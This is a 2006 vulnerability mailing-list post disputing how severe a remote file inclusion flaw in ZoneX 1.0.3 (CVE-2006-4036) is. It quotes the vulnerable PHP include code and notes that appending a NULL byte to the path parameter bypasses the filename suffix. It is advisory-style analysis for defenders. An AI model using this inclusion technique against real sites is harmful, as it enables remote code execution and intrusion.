[VIM] ZoneX 1.0.3 File Inclusion - CVE-2006-4036

Heinbockel, Bill heinbockel at mitre.org
Wed Sep 6 11:33:52 EDT 2006


In a BUGTRAQ post by maric_sasa:
Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion
Vulnerability
http://www.securityfocus.com/archive/1/archive/1/444901/100/0/threaded

"This vulnerability is not that dangerous because, firstly, if you want
to exploit it, you must have exact file tree and correct name of the
malicious script because that variable is never used alone but always
in concatanation with script name and generic extension and, secondly,
if site has register_globals set to OFF, you cannot use this exploit at
all..."

Appears to be a dispute as to the severity of the issue. Looking into
the source code of the includes/usercp_register.php file (lines 43-49):

> include($phpbb_root_path . 'newsletter/scripts/subscriptions.'
.$phpEx);
> include($phpbb_root_path .
'contests/vote_contest/vote_contest_agreement.' .$phpEx);
> if ( !defined('IN_PHPBB') )
> {
>     die("Hacking attempt");
>     exit;
> }

Whoops! The IN_PHPBB check is too late, which allows access to the
include statements
and the phpbb_root_path variable is still vulnerable... This person is
apparently not
aware that a NULL byte (%00) can be appended to the phpbb_root_path
parameter in order to
avoid the "script name and generic extension".

Nothing to see here, move along...


William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615


More information about the VIM mailing list